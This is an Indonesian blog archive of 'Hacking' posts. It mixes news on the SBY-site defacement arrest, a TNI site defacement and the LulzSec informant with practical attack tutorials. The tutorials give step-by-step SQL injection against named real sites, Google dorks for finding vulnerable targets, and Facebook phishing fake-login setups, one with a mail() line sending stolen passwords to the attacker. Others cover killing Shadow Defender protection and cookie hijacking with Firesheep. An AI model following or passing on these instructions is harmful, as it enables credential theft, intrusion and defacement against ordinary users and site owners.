Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

Profil Wildan, Si Peretas Situs SBY

Profil Wildan, Si Peretas Situs SBY

Profil Wildan, Si Peretas Situs SBY - Jagad maya Indonesia digegerkan dengan dialihkannya Domain Name System (DNS) situs milik Presiden Susilo Bambang Yudhoyono (SBY) awal Januari 2013. Seketika laman situs itu berganti wujud. Kejadian itu menjadi sorotan sejumlah media, dan sejumlah pihak pastinya bertanya siapakah dalang dari pertiwa itu? Jumat,25 Januari 2013 malam sebuah Warung Internet (Warnet) CV Surya Tama yang terletak di Jalan Suprapti Kabupaten Jember, Jawa Timur didatangi oleh petugas kepolisian. Salah satu pekerja di Warnet itu pun digelandang ke Jakarta untuk diperiksa. Tak lama berselang, munculah inisial 'WYA' yang bertanggungjawab atas aksi deface ke situs presidensby.info. Belakangan insial itu merujuk pada Wildan Yani Ashari, tidak banyak informasi terkait jatidiri remaja yang menjaili situs orang nomor satu di Indonesia ini. Pihak keluarga baru dikabari perihal penangkapan tersebut keesokan harinya melalui perangkat desa. Wildan, remaja 20 tahun ini merupakan salah satu watga di Desa Balung Kulon, Kecamatan Balung, Jember, Jawa Timur. Remaja lulusan Sekolah Teknik Menengah (STM) -- sekarang Sekolah Menengah Kejuruan (SMK) ini dikenal sebagai siswa yang tidak terlalu menonjol prestasi akademisnya. Lulus pada 2010, ia langsung tenar berkat mengalihkan Domain Name System (DNA) situs SBY. Pihak sekolah pun kaget dengan peristiwa itu. Meski mengetahui mantan anak didiknya bersalah, namun pihak sekolah meminta agar Wildan dibina agar kemampuannya dapat dimanfaatkan untuk kepentingan positif. Menariknya, hasil pemerikasaan yang dilakukan oleh pihak kepolisian, Direktur II Tindak Pidana Ekonomi Khusus Bareskrim Mabes Polri, Brigjen Pol Arief Sulistyo mengatakan, Wildan mengaku belajar komputer secara otodidak. Sayangnya, berkat kemampuannya ini Wildan terancam dikenakan Pasal 22 huruf b UU 36 Tahun 1999 tentang telekomunikasi dan Pasal 30 ayat 1,2,3 jo Pasal 32 ayat 1 UU Nomor 11 Tahun 2008 tentang ITE. Sementara itu, dukungan pun terus datang. Terkini, sebuah aksi #OpFreeWildan mengerjai sejumlah situs milik instansi pemerintah. Bahkan sebuah pernyataan di-posting untuk meminta Pemerintah Indonesia bertindak secara adil.
readmore »»  

Indonesia Miliki 65 Ribu Hacker

anaksketers.blogspot.com
Ilustrasi
Apakah Facebook Anda berubah sendiri atau email Anda mengirimkan sesuatu tanpa seizin Anda selaku pemilik akun? Kemungkinan besar Facebook atau email Anda sudah diretas oleh hacker, tentu hal ini menyebalkan.
Para hacker tidak hanya bisa mengacak-acak akun pribadi di jejaring sosial setelah membajak akun emailnya. Tetapi banyak hal yang bisa mereka lakukan, seperti membuat virus lokal yang mampu memformat hard drive tanpa seizin yang punya, bahkan mencuri data kartu kredit.
Entah ada berapa banyak hacker di dunia. Menurut pengamat Teknologi Informasi, di Indonesia saja ada sekitar 65 ribu hacker. "Basis terbesar di Yogyakarta, peretas di Yogya lebih aktif dan kreatif," kata Onno W Purbo di Jakarta, Kamis (22/9).
Onno mengatakan perguruan tinggi adalah "kawah candradimuka" peretas untuk belajar dan terus berkembang membuat virus. Bahkan dari beberapa hacker di Indonesia, sudah ada yang menjadi ahli keamanan di perusahaan Internasional.
“Seorang peretas yang hebat bukan saja mampu membuat virus dan mengambil data seseorang untuk kepentingan pribadi tapi juga membuat sistem keamanan yang kuat supaya tidak bisa ditembus oleh para peretas lainnya,” katanya. (tia/jo)
readmore »»  

Cara Singkat Deface Website Dengan Tools SQLI Helper

Sebenarnya bug SQL pada situs-situs berbasis php sudah lama ditemukan. Karena bug itu sudah lama, jadi sudah tidak banyak lagi situs-situs yang terdapat bug SQL-nya.
Tapi setelah saya coba searching dengan bantuan om Google, ternyata masih ada loh…. ^^. Ada baiknya trik ini dipakai cuman untuk media pembelajaran. Kalaupun nanti anda melakukan lebih dari itu, saya gak tanggung jawab deh! haha….

Nah, seperti pada judul diatas. Kita akan melakukan teknik SQL Injection Union pada situs-situs berbasis php dengan bantuan tools SQLI Helper.

Namun jika anda ingin melakukannya secara manual, anda bisa mencari situs-situs yang mengupas artikel SQL Injection secara manual. Banyak kok….. icon biggrin Cara Singkat Deface Website Dengan Tools SQLI Helper
Tapi kalau ada yang gampang, ngapain cari yang susah!! Bener gak? Hahahaha….
Ok, kita langsung saja ya…..

Langkah pertama, download tools SQLI Helper V 2.7 melalui link dibawah ini. Sizenya gak gede-gede amat kok. Cuman 241 KB. Download klik disini.
Oh ya, ketika anda menjalankan tools ini. Pastikan safety guard/resident shield antivirus anda dalam keadaan nonaktif ya. Soalnya tools ini akan dianggap trojan. Tapi saya jamin, tools ini aman kok. ^^

Langkah kedua, setelah selesai didownload. Buka tools tersebut, dan akan muncul tampilan kurang lebih seperti ini.

Pada kolom Target, kita akan mengisikan alamat url situs yang kita curigai masih terdapat bug SQL-nya. Namun url yang dijadikan target bukan url seperti biasanya, misalnya : http://duniainternet.info. Namun, http://www.er.com.my/Content.php?id=1.
Loh, cara dapetin url seperti itu gimana? mudah kok….!! Dengan bantuan om Google, apapun yang kita cari bisa kita dapatkan. (berarti bisa tau sapi saya yang ilang dong? XD).
Buka Google.com. Lalu masukkan script berikut di kotak penelusuran.
inurl:content.php?id=
atau
inurl:trainers.php?id=
atau
inurl:buy.php?category=
atau
inurl:article.php?ID=
Maka akan muncul seribu satu macam website yang url-nya mirip seperti yang saya contohkan diatas. Sebenarnya masih banyak sih script atau dork SQL yang bisa kita dapatkan di internet. Nanti di artikel berikutnya, saya akan coba memberikannya secara lengkap untuk anda. Sabar aja ya… ^^

Langkah ketiga, diumpamakan anda telah memilih satu situs yang akan digunakan sebagai target. Namun kita harus tahu, situs tersebut terdapat bug SQL nya tidak? cara cepat mengetahui situs tersebut vuln terhadapt serangan SQL adalah dengan memberikan tanda ” “(petik satu) di akhir url tersebut.
Contoh :
Situs target http://www.er.com.my/Content.php?id=1. Cek apakah situs tersebut ada bug SQLnya dengan menambahkan http://www.er.com.my/Content.php?id=1‘ (tanda petik satu) dibelakang 1. Paham?
Nah, kalau situs itu mengeluarkan pesan error. Maka bisa disimpulkan, situs tersebut masih vuln dengan SQL Injection. Pesan error-nya kurang lebih seperti ini.

Langkah keempat, masukkan url situs tadi ke kolom Target di tools SQLI Helper. Oh ya, tanda petiknya gak usah dipakai lagi ya. Cukup urlnya saja. Ingat….. tanpa tanda petik di akhir url!!
Setelah itu klik Inject. Maka secara otomatis dia akan memeriksa ulang apakah url tersebut vuln atau tidak, versi database, supports union, dll.
Kalau langkah Inject berhasil, maka akan muncul tampilan seperti ini.

Mantab!! Sekarang saatnya klik Get Database dibawah menu Inject.
Selanjutnya, klik Database name. Di contoh muncul 2 Database name. Information schema dan natural. Pilih database selain Information schema. Seperti contoh dibawag, saya memilih database natural. Selanjutnya klik Get Tables.

Akan muncul beberapa list Tables yang ada. Sekarang tugas kita tinggal mencari tabel yang berisikan username dan password administratornya. Biasanya nama tabelnya tidak jauh-jauh dari admin_user, admin_login, atau apapun yang berbau informasi login admin. ^^

Seperti contoh diatas, saya mendapatkan tabel admin_user. Doakan saja terdapt informasi username dan password admin didalam tabel tersebut. Langkah selanjutnya pilih admin_user dan klik Get Coloumns.

Wahhhhh… ternyata benar! Disana tersimpan user_name, user_email, dan tentunya user_pwd (password). Cihuyy… langsung aja blok user_name, dan user_pwd lalu tekan Dump Now.

Maka dengan segera, informasi mengenai username dan password administrator jatuh ketangan kita. Hahaha….. Gimana, mudah ya?
Ada yang aneh?? Password yang ditampilkan bentuknya seperti ini ya?
987d29241cc4f2a7465f2d9356ab3615
987d29241cc4f2a7465f2d9356ab3615
Password tersebut dienkripsi dengan menggunakan metode MD5. Jadi kita harus menterjemahkan kode tersebut menjadi password yang sebenarnya. Nah, bagaimana caranya?
Caranya cukup mudah, buka saja situs md5crack.com, lalu masukkan kode tersebut di kotak penelusuran. Berdoa saja password anda tersebut cukup lemah, sehingga bisa dipecahkan dengan metode brute force. Setelah anda masukkan, klik Crack hash baby!

Maka, si password pun muncul….! Passwordnya ternyata admin. ^^

Langkah kelima, jika username dan password situs tersebut sudah ditangan, selanjutnya tinggal mencari form login dari situs tersebut. Misalnya :

http://situsanda.com/admin/
http://situsanda.com/login/
http://situsanda.com/administrator/
dsb……

Yang pasti, form login tersebut harus kita dapatkan. Entah bagaimanapun caranya…. ^^

Masih gak bisa juga??? Ck…ck…ck…. ya udah. Download tools Admin Finder deh kalo anda kesusahan dalam mencari form login situs tersebut. Download klik disini.
Cara kerjanya cukup mudah kok, tinggal masukkan url situs tersebut dan tunggu tools itu bekerja secara otomatis mencari halaman adminnya. Berdoa saja tools tersebut juga menemukannya…. icon razz Cara Singkat Deface Website Dengan Tools SQLI Helper
Jrengg….jreng…jrenggg….! Kita umpamakan anda telah mengetahui username, password, dan halaman admin website tersebut. Maka tinggal eksekusi deh website tersebut…. Hahaha.
Saran saya cuman satu, usahakan jangan merusak tampilan website terseubut. Buat aja halaman baru yang memberitahukan bahwa situs tersebut terdapat bug SQL nya. Ingat dosa gan…. !! ^^
readmore »»  

Situs TNI Indonesia berhasil di Utak-Atik Rakyatnya.

Para peretas situs (hacker) sepertinya belum puas mengobok-obok situs Mabes Polri, Lemhannas, dan Pertamina. Kali ini, giliran situs milik TNI yang beralamat di http://internalpen.tni.mil.id/ disusupi gambar dan tulisan tidak resmi.
MONITOR Indonesia memantau, Kamis (19/5/2011), pukul 21.26 WIB, dalam halaman itu nampak sebuah gambar empat anak kecil dalam posisi menghormat, dibalut bendera merah putih. Sementara sebagian tubuhnya terdapat tulisan ‘Bangga Menjadi Anak Indonesia’.
Sedangkan di bawah gambar keempat bocah itu, sang peretas ini juga menuliskan tiga pesan. Masing-masing pesan itu adalah ucapan terimakasih kepada teman-temannya.
Ucapan terimakasih khusus disampaikan kepada Yogyacarderlink dan Bekasi Cyber. Sedangkan ucapan terimakasih disematkan kepada Bekasi0d0nk, Zuanbinjai, Motaro, Travis, LadyzCute,  Z0mb13, Bh3nd, Joglo,  And You-mungkin maksudnya pembaca.
Sang peretas ini juga menitip pesan kepada DPR dengan tulisan, ‘Hargailah Kami Sebagai Rakyat, Jangan Hanya Bisa Menyakiti Hati Kami, Belajar Untuk Mengasihi’.
Tak ketinggalan, ada juga pesan yang khusus disampaikan untuk Polri. Mereka meminta agar tindakannya tidak dianggap sebagai pelanggaran hukum. Peretas ini menulis ‘Pesan untuk Polri : Pak mohon Hacker bukan ancaman untuk negara, yang membuat ancaman adalah koruptor yang enak2an ngabisin uang rakyat, Thankz’.
Di bagian terakhir terdapat tulisan penutup Security test by Indonesiaraya INDONESIA WHITE HACKER. Diduga sang peretas ini ingin menunjukkan identitasnya.
Hingga kini belum jelas motif pelaku melakukan aksinya ini. Sampai berita ini diturunkan, halaman asing itu  masih berada di bawah alamat situs resmi milik TNI http://www.tni.mil.id/.
readmore »»  

Dicari hacker Untuk membantu FBI menangkap hacker lain

NEW YORK - Salah satu yang paling dicari di dunia hacker diam-diam menjadi informan FBI tahun lalu, memberikan bukti yang mengarah ke tuduhan pada Selasa terhadap lima tersangka pemimpin lain dari kelompok hacker Anonymous internasional.

Dalam sebuah pukulan besar bagi  Anonymous, yang telah menyerang situs-situs lembaga pemerintah dan perusahaan di seluruh dunia, otoritas AS mengungkapkan bahwa seorang hacker terkemuka "Sabu" adalah Hector Xavier Monsegur dan bahwa dia ditangkap di apartemen kecil di sebuah perumahan Manhattan kompleks lalu Juni.
Pada pengadilan rahasia pendengaran pada 15 Agustus, 2011 Monsegur, 28, mengaku bersalah atas masing-masing 12 kejahatan komputer dan setuju untuk bekerja sama dengan pihak berwenang dengan imbalan keringanan hukuman, menurut transkrip yang dipublikasikan Selasa.

Jaksa AS dan FBI pada hari Selasa mengumumkan dakwaan terhadap lima orang lainnya, termasuk dua di Inggris dan dua di Irlandia yang semuanya sebelumnya ditangkap.

Yang kelima adalah Jeremy Hammond, yang dikenal sebagai "Anarchaos," yang ditangkap di Chicago pada hari Senin atas tuduhan hacking ke Forecasting Inc Strategis, atau "Stratfor", sebuah intelijen global dan perusahaan riset, pada bulan Desember 2011.

Semua enam adalah anggota atas LulzSec, sebuah cabang dari kelompok longgar-merajut cyber-aktivis internasional Anonymous.

"Ini penjahat cyber berafiliasi diri dengan  Anonymous dalam berbagai cara. Mereka tidak  Anonymous hari ini, mereka telah diidentifikasi dan dibebankan, "kata seorang penegak hukum resmi, yang tidak ingin diidentifikasi sebagai penyelidikan itu sedang berlangsung.

LulzSec dan  Anonymous telah mengambil kredit untuk melakukan serangan terhadap CIA, Badan Kejahatan Serius Terorganisasi Inggris, Jepang Sony Corp, situs web pemerintah Meksiko dan polisi nasional di Irlandia. Korban lainnya termasuk Rupert Murdoch Inggris koran lengan Berita Internasional, Fox Broadcasting dan Sony Pictures Entertainment.

Pakar Cyber ​​keamanan mengatakan penahanan itu merupakan kemunduran besar bagi kelompok hacking Anonymous dan lainnya berafiliasi dengan itu.

"Sabu dipandang sebagai seorang pemimpin ... Sekarang  Anonymous  menyadari dia mengadu dan bekerja sendiri untuk Fed, mereka harus berpikir: "Jika kita tidak bisa mempercayai Sabu, siapa lagi yang bisa kita percaya" "kata Mikko Hypponen, kepala kantor penelitian di Finlandia keamanan komputer perusahaan F-Secure.

"Ini mungkin tidak akan menjadi akhir  Anonymous , tapi itu akan memakan waktu cukup lama bagi mereka untuk pulih, terutama dari paranoia," kata Hypponen.

Ahli lain mengatakan itu tetap harus dilihat apakah penangkapan akan mengakhiri hacking ilegal oleh afiliasi Anonymous.

"Anda selalu khawatir dalam hal-hal yang mereka punya orang-orang di pinggiran kelompok," kata Stewart Baker, seorang mantan pejabat senior di Departemen Keamanan Dalam Negeri dan sekarang menjadi ahli keamanan dunia maya di firma hukum Steptoe dan Johnson.

Informan HACKER "PENGKHIANAT"

Ruang chat online disukai oleh Anonymous pada Selasa diisi dengan empedu dan khawatir tentang siapa yang akan menjadi berikutnya. Salah satu anggota memperingatkan bahwa Monsegur sebaiknya sudah baik di jaga oleh pengawal FBI , sementara yang lain mengatakan penahanan bisa mendorong serangan balasan.

Para Anonymous berafiliasi akun Twitter zYourAnonNews disebut Monsegur "pengkhianat" dan mengecilkan biaya, mengklaim "kita tidak memiliki pemimpin".

Gerakan hack dia membantu menyulut masih beraksi setelah terpapar nya. Selasa malam, hacker bertindak atas nama Antisec masuk ke website yang dimiliki oleh Panda Security, yang telah membantu polisi menyelidiki  Anonymous  sebelum penangkapan terakhir di Eropa.

Para hacker meninggalkan senonoh-sarat kritik dari kedua perusahaan yang berbasis di Spanyol dan Sabu. "Ya ya kita tahu? Sabu snitched pada kita", tulis mereka. "Cinta untuk mereka yang berjuang untuk sesuatu yang mereka percaya".

Lahir di New York, Monsegur kuliah dan bekerja di pekerjaan teknologi, menampilkan kombinasi yang jarang bakat hacking, kelas pekerja sensibilitas dan keyakinan politik. Ia mengatakan ia pertama hack untuk suatu tujuan lebih dari satu dekade lalu ketika ia mengganggu komunikasi selama kontroversial latihan pemboman Angkatan Laut AS di Vieques.

Menurut sebuah posting di ruang chat online pada bulan September yang muncul untuk memasukkan "Sabu," dia ditanya apa saran dia akan memberikan hacker baru.

"Tetaplah pada dirimu," jawab "Sabu." "Jika Anda berada dalam crew- terus opsec Anda up 24/7. Teman akan mencoba untuk membawa Anda ke bawah jika itu harus. "

Sebagai pemimpin dari Lulz Keamanan (LulzSec), Monsegur mengambil tanggung jawab untuk serangan terhadap situs-situs eBay PayPal, MasterCard Inc dan Visa Inc antara Desember 2010 dan Juni 2011, menurut dokumen pengadilan.

Dia bebas pada ikatan $ 50.000. Salah satu tuduhan membawa penjara jangka maksimal 30 tahun.

Perwakilan dari perusahaan, yang telah menjadi target karena mereka menolak untuk memproses sumbangan untuk WikiLeaks, menolak mengomentari penangkapan

SEJUTA KORBAN

Monsegur juga mengidentifikasi dirinya sebagai anggota kelompok hacking "FBI Internet" sementara Hammond mengatakan ia adalah anggota dari sebuah perusahaan afiliasi lainnya  Anonymous , "AntiSec," kata pejabat.

Sebuah pengaduan pidana mengutip salah satu posting Hammond mengatakan, "Kami menyerukan kepada semua kapal perang sekutu, semua tentara dari kegelapan, untuk menggunakan dan menyalahgunakan daftar password ini dan informasi kartu kredit untuk melampiaskan malapetaka suci pada sistem dan account email pribadi ini kaya dan berkuasa penindas. "

Pengacara Monsegur dan Hammond tidak segera menjawab atau memberikan komentar pada biaya.

Pemerintah AS mengatakan serangan cyber telah mempengaruhi lebih dari 1 juta orang dan sistem komputer pemerintah asing, seperti Aljazair, Yaman dan Zimbabwe.

Pihak berwenang mengatakan Monsegur dan tiga orang dibebankan menggerebek informasi pribadi tentang potensi 70.000 kontestan di acara televisi Fox "X-Factor."

Dalam contoh lain dari hacking, kata para pejabat terdakwa dan orang lain masuk ke server komputer perusahaan HBGary di California dan Colorado, termasuk sekitar 60.000 email dan diposting di situs file-sharing.

Dalam hack 2011 Mei pada Sony Pictures, beberapa terdakwa mencuri informasi rahasia dari sekitar 100.000 pengguna dari situs web Sony Pictures, termasuk password, alamat email, alamat rumah dan tanggal lahir.

"Saya pribadi ikut dalam serangan cyber pada sistem HBGary dan Fox, mengakibatkan kerugian lebih dari $ 5.000, dan saya tahu perilaku saya itu ilegal," mengaku Monsegur pada bulan Agustus di melanjutkan permintaannya.

Musim panas lalu, sebagai bagian dari serangan terkoordinasi penegakan hukum pada kelompok, polisi Inggris menahan Jake Davis, anggota lain yang dicurigai LulzSec yang pergi dengan julukan "Topiary."

Salah satu kasus mengumumkan pada hari Selasa melawan Davis, seorang remaja dituduh serangan komputer pada Sony, kejahatan Inggris dan otoritas kesehatan, dan Rupert Murdoch Inggris koran lengan Berita Internasional, sebuah unit dari News Corp

Davis diyakini telah menguasai akun Twitter utama Lulz Security, yang kelompok yang digunakan untuk menerbitkan data yang diperoleh oleh hacking ke jaringan perusahaan dan pemerintah.

LulzSec memiliki lebih dari 350.000 pengikut di Twitter.

Bulan lalu, Anonymous diterbitkan rekaman panggilan rahasia pada 17 Januari antara FBI dan detektif London di mana agen dibahas tindakan terhadap hacker. Satu dari enam ditangkap pada Selasa adalah Donncha O'Cearrbhail, 19, dari Irlandia, yang didakwa atas mencegat telepon.
readmore »»  

More Google Dork




Google A Hackers Best Friend


Here Are Some Codes People Will Find Useful

Dorks:

inurl:"view.asp?page=" intext:"plymouth"

Ok what this code does ? So this is the university schools you can hack with this dork university schools.
--------------------------------------------------------------------


inurl:"shoutbox.php" intext:"script"

with this code you can hack shoutbox or to find scripts

--------------------------------------------------------------------

inurl:"index.php?act=idx"

This code will find ipb forums quickly to hack

--------------------------------------------------------------------
inurl:"Photoshop.aspx" "tutorials"

This code will find photoshop tutorials
--------------------------------------------------------------------
intext:"Warning: mysql_fetch_array()"

With this code you will find any vulnarable sites and hack them.

--------------------------------------------------------------------
"powered by vbulletin" + "account dumps"

With this code you will be able find passwords for any sites,forums not for porn.
--------------------------------------------------------------------

site:youtube.com *@gmail.com

This will find any youtube or any site emails.


--------------------------------------------------------------------
"sql google scanner" + "php"

Google sql injection online hack vulnerable sites,forums and find vulnerables sites very easy.

--------------------------------------------------------------------
allinurl:smiliehelp.php
allinurl:"guestbook/smileys.php"
inurl:"smileys.php" + "talking"


Talking smilies.
--------------------------------------------------------------------Good Luck . . . :D
readmore »»  

Cara Hack Facebook Dengan Metode Fake Login / Phising / Scam

Cara Hack Facebook Dengan Metode Fake Login / Phising / Scam

PERTAMA:
Cara ini paling banyak digunakan dan terbukti efektif untuk meng-hack facebook, sebenarnya metodenya simple saja, kita tinggal membuat halaman login palsu yang kemudian kita upload ke sebuah website bahkan website gratisan pun bisa, kemudian kita pancing pengguna facebook agar menuju halaman login facebook palsu tersebut, cara memancing pengguna facebook pun ber macam macam bisa lewat email palsu yang mengatasnamakan facebook, link login palsu dan metode social engineering lainnya. Cara mencegah hack facebook dengan metode ini : sebelum anda login atau memasukkan username dan password anda pastikan bahwa alamat url tersebut benar, jika anda tidak yakin buka saja sebuah jendela baru, masukan alamat facebook (http://www.facebook.com) dan login melalui jendela tersebut. pastikan keaslian email yang mengatasnamakan facebook yang memancing anda agar login facebook yang masuk ke inbox anda, atau abaikan saja email tersebut.
KEDUA:
Facebook banyak sekali orang yang menggunakannya di indonesia hingga ribuanpun.
hampir-hampir saja facebook diharamkan.
Sesudah saya posting tentang cara login palsu di friendster, hari ini saya posting tentang cara membuat login palsu di facebook.
1. silahkan anda daftar di http://www.700megs.com
mengapa saya suruh anda daftar disana ?
di web hosting sana sangat gratis dan support php juga dari pada di ripway.com
bila tidak bisa terdaftar langsung saja masuk di :
http://www.700megs.com/register.jsp
2. setelah anda berhasil mendaftar di 700megs.com masuk ke FILE MANAGER…hapus file index.html.(akan ada di Cpanel masing2 nantinya)
3. oke, kita mulai praktek kita.
yang dibutuhkan adalah file index.php dan write.php sebagai inti fakelogin
silahkan download scriptnya dahulu disini atau di
http://www.ziddu.com/download/5023245/scriptFakeloginFacebook.rar.html
ukuran cuma 9kb.
4. setelah anda download. Disana ada dua file sebut saja index dan write
kedua-duanya silahkan anda upload di 700megs.com yang tadi anda sudah daftar.
5. lalu tes terlebih dahulu index.php yg telah kalian upload dan login dari situ,
klo berhasil.. akan ada file baru ;Password.txt [bertujuan sebagai tempat dimana userID dan password yang akan tertampung di facebook fakelogin kamu]
6, alright! selesai sampai di sini. . .
untuk penyebarannya silahkan dengan cara masing2…
disini saya cm kasih contoh satu untuk pengambilan secara paksa account2 facebook mania..
buka file index di www.700megs.com kalian..ambil URL nya.. [penting]
terus untuk pengguna firefox: buka tools>option>main
preview:
http://i410.photobucket.com/albums/pp190/eta_rrrrock/kidego1.jpg
disni fungsinya kita mengarahkan agar browser waktu pertama kali dibuka langsung mengarah ke file kita tadi. memungkinkan hasil buruan kalian lebih banyak nantinya.
boleh di sebar ke komputer temen/di warnet2 kesayangan.
atau..
bisa juga menyebarkan dengan cara seperti ini
http://i410.photobucket.com/albums/pp190/eta_rrrrock/32.jpg
kamu buat account baru,di yahoo,gmail,ato sejenisnya
dengan nick Facebook@ or something like that.
diatas cm contoh…silahkan kamu buat seni sendiri
enjoy..
mudahkan ??
semoga berhasil . . ..
KETIGA:
Yang paling penting siapin dulu web hosting buat naruh file fake login bisa yang gratis atau bayar terserah kalian pilih yg mana.,.,.,.,.,.,
1. download dan extract file index.html download dulu disini
2. download dan extract file logs.php download dulu disini
3. download dan extract file log.txt download dulu disini
Password : Flow
dah disiapin belum web hostingnya? ql belum aku saran mending pakek ripway.
nah kalau sudah registrasi, kalian upload dech file file yang kalian extract tadi.,.,.,.,.
pengertian:
- index.html : Halaman utama login palsu, alamat ini yang kalian sebar ke target.
Ex: http://h1.ripway.com/nama_kalian/index.html
- logs.php : Berfungsi untuk mengirimkam hasil hack dari index.html ke logs.txt
- logs.txt : Berfungsi untuk menampung hasil jerih payah kita
Ex: Email + Password Facebook.
sebarin dech alamat Fake Login kita tadi (index.html),.,.,.,
tinggal tunggu orang yang terlalu ceroboh login pakek Fake login kita.
saran bagi facebook’er :
1) Perhatikan dengan benar link address websitenya. Contoh klo FB linknya: http://www.facebook.com
2) Jangan pernah membuka link atau bahasa pemograman (CSS, XTML, XML, atau
HTML) yang aneh. Jika di klik, kemungkinan account kita akan memberikan
username dan password kita.
3) Pakailah virtual keyboard yang bisa diperoleh dengan mudah.
Untuk Windows tampilan XP, hanya cukup klik ’start’ -> All Programs ->
Accessories -> Accessibility -> ‘On-Screen Keyboard’
Untuk Windows tampilan bukan XP, hanya cukup klik ’start’ -> Program Files
-> Accessories -> Accessibility -> ‘On-Screen Keyboard’
4) Bila bermain di Warung Internet (Warnet), hindari check-list kotak
“Remember me” pada saat login, karena hal itu dapat menyimpan username
dan password di komputer tersebut. Kecuali memakai komputer pribadi.
5) Jika anda tiba-tiba diminta login ulang, sebaiknya hati hati, karena kemungkinan halaman pe-login ulang tersebut adalah halaman palsu yang sengaja dirancang. bila terlanjur cepat ganti password kalian,.,.,.,.
readmore »»  

Cara Menjebol Proteksi Shadow Defender dan Program Sejenisnya Menggunakan Smadav

1. Buka SMADAV
pada Contoh ini saya menggunakan smadav rev 8.4 pro
kalo belum punya silahkan di download di
http://download1326.mediafire.com/m13ivi4pz9mg/nt8vg2yxyd1bwab/Smadav+2011+Rev.+8.4+%5Bpasgo-sega.blogspot.com%5D.rar

2. Pada Smadav Anda Klik "Tools" ===> "Process Manager"
3. Klik kanan pada logi "Defender"
4. Klik "Action" ===> KILL

Otomatis dalam beberapa detik logi "Shadow Defender" di systray (letaknya di sudut kanan bawah dekat jam) akan hilang.

5. Restart Komputer anda.
6. Setelah restart, maka pada logo “Shadow Defender” di systray akan berubah dari biru
(aktif) menjadi coklat ( tidak aktif)
7. Saat “Shadow Defender” tidak aktif inilah anda bisa meng uninstall software ini pada
computer anda.

Untuk cara uninstal nya cara nya sama seperti anda meng uninstall software.
Yaitu klik Start ==> All Program ==> Control Panel ==> Add or Remove Programs.
Lalu pilih dan klik “Shadow Defender”, klik “Remove dan klik “YES”
Proses Uninstal Shadow Defender Selesai
readmore »»  

Hacking Akun Facebook Via Facebook

Facebook, sapa sih yang gak kenal Facebook??? Salah satu situs jejaring sosial terbesar selain Friendster dan Twitter. Facebook dikenal karena kemudahan dan tentunya keamanannya.

Aman?? 100%?? hem..tidak ada yang sempurna.. banyak para hacker yang berusaha menembus pertahanan Facebook, seperti yang dilakukan team inj3ct0r yang menggunakan tehnik SQL pada salah satu Apps yang ada di Faceboook. Tehnik lain?? hem..saat ini lebih banyak menggunakan Social Enginering seperti tehnik Pishing,Poisoning Attack pada satu jaringan,Fake Login dll.

Disini saya akan membahas salah satu tehnik Social Enginering yaaa semacam fake login tapi menggunakan fasilitas Facebook itu sendiri.Maksudnya??maksudnya adalah kita membuat halaman palsu berupa apps di dalam Facebook tersebut.
Tata cara nya sebagai berikut:

1. Download scriptnya dulu http://www.mediafire.com/?448qgmyux5o2mb8 atau http://idws.us/jjfjdc
2. Cari server gratisan atau injekkan yang support .PHP ( tanya om Google ) atau .ASP ( http://www.jabry.net )
3. Facebook tentunya
Mulai pembuatannya deh :
Sudah disiapkan scriptnya?? kalau sudah, ubahlah di bagian yang saya tandai menjadi alamat e-mail anda

.PHP  Code:
mail(
"youremailaddress@domain.com",

.ASP Code:
Mailer.RemoteHost = "smtp.yourhost.com"
Mailer.AddRecipient "your name", "youremailaddress@host.com"
lalu upload ke server anda..dan tugas pertama kita selesai. :)

[Image: sshot6j.jpg]
Lalu masuk ke http://www.facebook.com/pages/create dan pilih "Perjuangan atau Komunitas" lalu masukkan nama halaman anda.
Disini dituntut kepandaian kita mengolah kata agar berkesan menarik. Contoh "Cek Kepopuleran FB Anda" dan selesaikan langkah yang di anjurkan.
Kalau udah punya Logo buat halaman kita lebih bagus lagi sekalian kita upload disana. Kalau udah di kolom "Alamat Web" kita isi http://www.facebook.com/ lalu selesai deh.
Saatnya kita masuk ke http://www.facebook.com/add.php?api_key=...1e44&pages dan kita pilih "aplikasi" lalu kita pilih "Go To Apps" dan masukkan kode FBML yang sudah didownload tadi.
Jangan lupa di bagian yang bertuliskan "http://yourwebsite.com/facebook.php" diganti Url tempat kita mengupload file Facebook.php tadi...dan klik "Save". selesai sudah tugas ke 2 kita. Lihat gambar dibawah ini

[Image: sshot7y.jpg]
Terakhir, kita share halaman yang udah kita buat tadi, lalu minta teman - teman kita buat meng-klik tombol "Like" usahakan minimal 25 orang yang nge-like. Jadi kita bisa membuat "username" untuk halaman kita, misal jadi "http://www.facebook.com/pagechecker" dan berharap orang-orang mencoba aplikasi kita, lalu boom..panen password deh....cek folder spam di server e-mail kita.

Kalau mau liat hasilnya ni ada halaman demonya,tapi jangan coba-coba masukkin password asli ya..he he he
DEMO
http://www.facebook.com/pages/Cek-Harga-...4949752878
tampilan kalau ada yang coba nih halaman kaya gini..

[Image: sshot3e.jpg]
[Image: sshot4g.jpg]
Dan hasilnya akan terekam dengan baik di e-mail yang udah kita setting tadi...he he he

[Image: sshot5e.jpg]
readmore »»  

Cara Hack Akun Facebook Dengan Network Sniffing

PERTAMA:
Bagi anda pengguna facebook yang menggunakan koneksi internet yang juga digunakan banyak orang seperti warnet atau koneksi internet di kampus atau tempat umum atau hotspot, apalagi yang gratisan harap berhati-hati. cara hack facebook dengan metode ini cukup mudah, berbekal software packet sniffer yang sangat mudah di download dan digunakan untuk memantau dan menyimpan paket lalu lintas jaringan, seseorang bisa dengan mudah membobol akun facebook dengan memanfaatkan paket data yang tersimpan tadi. cara menghindari agar akun facebook anda tidak kena hack dengan cara ini adalah dengan berhati-hati saat mengakses facebook, pastikan warnet atau hotspot area yang anda gunakan benar-benar aman.
KEDUA:
Cukup mudah untuk hacking facebook account saat ini, kmu dapat menggunakan firefox addon freesheep, yaitu sebuah addon Firefox yang mampu mencuri sesi cookie dari Facebook, Twitter dan account lainnya pada Web 2.0 yang tidak terenkripsi jaringan nirkabel terbuka.
cara menggunakanya sebagai berikut:
1. Download .xpi file di http://codebutler.github.com/firesheep/
2. install file .xpi tersebut
3. Install WinPcap, download di www.winpcap.org
4. jika instlasi firesheep dan wincap sudah selesai, buka firefox, klik menu tools > addons >Firesheep
5. klik preferences icon dan pilihi kartu interface jaringan pc / wireless card
6. klik  “Start Capturing”
7. tunggu beberapa saat, jika ada pengguna wireless yang mengakses website facebook maka firesheep akan siap menghack cookies nya.
nah gimana cara mencegah pencurian password dengan firesheep ini?
kamu dapat menggunakan software ForceTLS, download di https://addons.mozilla.org/en-US/firefox/addon/force-tls/
KETIGA:
Bismillah,
